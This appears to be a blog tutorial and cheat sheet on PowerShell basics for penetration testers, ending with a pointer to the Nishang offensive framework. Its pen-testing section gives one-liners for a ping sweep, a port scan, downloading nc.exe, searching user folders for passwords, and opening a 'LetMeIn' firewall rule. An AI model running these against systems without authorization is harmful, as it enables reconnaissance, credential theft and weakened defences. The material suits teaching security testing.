A look at powershell for penetration testing

Powershell is a very useful and powerful tool which is available in Windows 10 it is the successor to the old command prompt (cmd.exe)

In this article we look at some useful and basic examples to get you started

Starting PowerShell

PowerShell is accessed by pressing Start -> typing powershell and pressing enter. Some operations require administrative privileges so you need to launch PowerShell as an elevated session.

You can launch an elevated PowerShell by pressing Start > typing powershell and pressing Shift-CTRL Enter

 

Useful Cmdlets (and aliases)

Get a directory listing (ls, dir, gci): PS C:\> Get-ChildItem

Copy a file (cp, copy, cpi): PS C:\> Copy-Item src.txt dst.txt

Move a file (mv, move, mi): PS C:\> Move-Item src.txt dst.txt

Find text within a file: PS C:\> Select-String –path c:\users \*.txt –pattern password PS C:\> ls -r c:\users -file | % {Select-String -path $_ -pattern password}

Display file contents (cat, type, gc): PS C:\> Get-Content file.txt

Get present directory (pwd, gl): PS C:\> Get-Location

Get a process listing (ps, gps): PS C:\> Get-Process

Get a service listing: PS C:\> Get-Service

Formatting output of a command (Format-List): PS C:\> ls | Format-List –property name

Paginating output: PS C:\> ls –r | Out-Host -paging

Get the SHA1 hash of a file: PS C:\> Get-FileHash -Algorithm SHA1 file.txt

Exporting output to CSV: PS C:\> Get-Process | Export-Csv procs.csv

Basic PowerShell for Pen testers

Conduct a ping sweep: PS C:\> 1..255 | % {echo “10.10.10.$_”; ping -n 1 -w 100 10.10.10.$_ | SelectString ttl}

Conduct a port scan: PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect(“10.10.10 .10”,$_)) “Port $_ is open!”} 2>$null

Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile(“http ://10.10.10.10/nc.exe”,”nc.exe”)

Find all files with a particular name: PS C:\> Get-ChildItem “C:\Users\” recurse -include *passwords*.txt

Get a listing of all installed Microsoft Hotfixes: PS C:\> Get-HotFix

Navigate the Windows registry: PS C:\> cd HKLM:\ PS HKLM:\> ls

List programs set to start automatically in the registry: PS C:\> Get-ItemProperty HKLM:\SOFTWARE \Microsoft\Windows\CurrentVersion\run

Convert string from ascii to Base64: PS C:\> [System.Convert]::ToBase64String([System .Text.Encoding]::UTF8.GetBytes(“PS FTW!”))

List and modify the Windows firewall rules: PS C:\> Get-NetFirewallRule –all PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn RemoteAddress 10.10.10.25

Finding Cmdlets

To get a list of all available cmdlets:
PS C:\> Get-Command

Get-Command supports filtering.

To filter cmdlets on the verb set:

PS C:\> Get-Command Set*
PS C:\> Get-Command –Verb Set

Or on the noun process:

PS C:\> Get-Command *Process
PS C:\> Get-Command –Noun process

Pipelining, Loops, and Variables

Piping cmdlet output to another cmdlet: PS C:\> Get-Process | Format-List –property name

ForEach-Object in the pipeline (alias %): PS C:\> ls *.txt | ForEach-Object {cat $_}

Where-Object condition (alias where or ?): PS C:\> Get-Process | Where-Object {$_.name –eq “notepad”}

Generating ranges of numbers and looping: PS C:\> 1..10 PS C:\> 1..10 | % {echo “Hello!”}

Creating and listing variables: PS C:\> $tmol = 42 PS C:\> ls variable:

Examples of passing cmdlet output down pipeline: PS C:\> dir | group extension | sort PS C:\> Get-Service dhcp | StopService -PassThru | Set

Getting Help

To get help with help: PS C:\> Get-Help

To read cmdlet self documentation: PS C:\> Get-Help <cmdlet>

Detailed help: PS C:\> Get-Help <cmdlet> -detailed

Usage examples: PS C:\> Get-Help <cmdlet> -examples

Full (everything) help: PS C:\> Get-Help <cmdlet> -full

Online help (if available): PS C:\> Get-Help <cmdlet> -online

 

More

If you want to learn more about powershell there are a myriad of online resources, if you want so see how powerful it can be I recommend looking at https://github.com/samratashok/nishang ,the summary on github sums it up for me

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

The powershell scripts are well worth looking at